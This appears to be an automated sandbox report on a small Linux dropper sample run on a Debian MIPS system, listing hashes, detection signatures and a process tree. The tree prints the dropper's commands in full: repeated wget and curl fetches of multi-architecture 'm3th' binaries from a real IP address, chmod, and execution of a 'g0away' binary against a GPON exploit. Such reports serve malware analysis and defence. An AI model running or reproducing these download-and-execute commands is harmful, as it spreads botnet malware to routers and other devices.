Analysis

  • max time kernel
    99s
  • max time network
    101s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    28-07-2024 16:40

General

  • Target

    17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

  • Size

    3KB

  • MD5

    17f41b4b65e5ddad4a76594560d43927

  • SHA1

    bb7691396c850ff2b4645b90336852650aa26eb6

  • SHA256

    36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

  • SHA512

    602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:714
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
        PID:715
      • /usr/bin/curl
        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
        2⤵
        • Reads runtime system information
        PID:719
      • /bin/cat
        cat m3th.x86
        2⤵
          PID:720
        • /bin/chmod
          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
          2⤵
            PID:721
          • /tmp/g0away
            ./g0away gpon8080.exploit
            2⤵
            • Executes dropped EXE
            PID:722
          • /usr/bin/wget
            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
            2⤵
              PID:724
            • /usr/bin/curl
              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
              2⤵
              • Reads runtime system information
              PID:725
            • /bin/cat
              cat m3th.mips
              2⤵
                PID:726
              • /bin/chmod
                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
                2⤵
                  PID:727
                • /tmp/g0away
                  ./g0away gpon8080.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:728
                • /usr/bin/wget
                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                  2⤵
                    PID:730
                  • /usr/bin/curl
                    curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                    2⤵
                    • Reads runtime system information
                    PID:731
                  • /bin/cat
                    cat m3th.mpsl
                    2⤵
                      PID:732
                    • /bin/chmod
                      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE
                      2⤵
                        PID:733
                      • /tmp/g0away
                        ./g0away gpon8080.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:734
                      • /usr/bin/wget
                        wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                        2⤵
                          PID:736
                        • /usr/bin/curl
                          curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                          2⤵
                          • Reads runtime system information
                          PID:737
                        • /bin/cat
                          cat m3th.arm
                          2⤵
                            PID:741
                          • /bin/chmod
                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                            2⤵
                              PID:742
                            • /tmp/g0away
                              ./g0away gpon8080.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:743
                            • /usr/bin/wget
                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                              2⤵
                                PID:745
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                                2⤵
                                • Reads runtime system information
                                PID:746
                              • /bin/cat
                                cat m3th.arm5
                                2⤵
                                  PID:747
                                • /bin/chmod
                                  chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                  2⤵
                                    PID:748
                                  • /tmp/g0away
                                    ./g0away gpon8080.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:749
                                  • /usr/bin/wget
                                    wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                    2⤵
                                      PID:751
                                    • /usr/bin/curl
                                      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                      2⤵
                                      • Reads runtime system information
                                      PID:752
                                    • /bin/cat
                                      cat m3th.arm6
                                      2⤵
                                        PID:753
                                      • /bin/chmod
                                        chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                        2⤵
                                          PID:754
                                        • /tmp/g0away
                                          ./g0away gpon8080.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:755
                                        • /usr/bin/wget
                                          wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                          2⤵
                                            PID:757
                                          • /usr/bin/curl
                                            curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                            2⤵
                                            • Reads runtime system information
                                            PID:758
                                          • /bin/cat
                                            cat m3th.arm7
                                            2⤵
                                              PID:759
                                            • /bin/chmod
                                              chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                              2⤵
                                                PID:760
                                              • /tmp/g0away
                                                ./g0away gpon8080.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:761
                                              • /usr/bin/wget
                                                wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                2⤵
                                                  PID:763
                                                • /usr/bin/curl
                                                  curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                  2⤵
                                                  • Reads runtime system information
                                                  PID:764
                                                • /bin/cat
                                                  cat m3th.ppc
                                                  2⤵
                                                    PID:765
                                                  • /bin/chmod
                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                    2⤵
                                                      PID:766
                                                    • /tmp/g0away
                                                      ./g0away gpon8080.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:767
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                      2⤵
                                                        PID:769
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                        2⤵
                                                        • Reads runtime system information
                                                        PID:770
                                                      • /bin/cat
                                                        cat m3th.m68k
                                                        2⤵
                                                          PID:771
                                                        • /bin/chmod
                                                          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                          2⤵
                                                            PID:772
                                                          • /tmp/g0away
                                                            ./g0away gpon8080.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:773
                                                          • /usr/bin/wget
                                                            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                            2⤵
                                                              PID:775
                                                            • /usr/bin/curl
                                                              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                              2⤵
                                                              • Reads runtime system information
                                                              PID:776
                                                            • /bin/cat
                                                              cat m3th.spc
                                                              2⤵
                                                                PID:777
                                                              • /bin/chmod
                                                                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                2⤵
                                                                  PID:778
                                                                • /tmp/g0away
                                                                  ./g0away gpon8080.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:779
                                                                • /usr/bin/wget
                                                                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                  2⤵
                                                                    PID:781
                                                                  • /usr/bin/curl
                                                                    curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                    2⤵
                                                                    • Reads runtime system information
                                                                    PID:782
                                                                  • /bin/cat
                                                                    cat m3th.i686
                                                                    2⤵
                                                                      PID:783
                                                                    • /bin/chmod
                                                                      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                      2⤵
                                                                        PID:784
                                                                      • /tmp/g0away
                                                                        ./g0away gpon8080.exploit
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:785
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                        2⤵
                                                                          PID:787
                                                                        • /usr/bin/curl
                                                                          curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:788
                                                                        • /bin/cat
                                                                          cat m3th.sh4
                                                                          2⤵
                                                                            PID:789
                                                                          • /bin/chmod
                                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                            2⤵
                                                                              PID:790
                                                                            • /tmp/g0away
                                                                              ./g0away gpon8080.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:791
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                              2⤵
                                                                                PID:793
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                                2⤵
                                                                                • Reads runtime system information
                                                                                PID:794
                                                                              • /bin/cat
                                                                                cat m3th.arc
                                                                                2⤵
                                                                                  PID:795
                                                                                • /bin/chmod
                                                                                  chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                                  2⤵
                                                                                    PID:796
                                                                                  • /tmp/g0away
                                                                                    ./g0away gpon8080.exploit
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:797

                                                                                Network

                                                                                MITRE ATT&CK Matrix

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads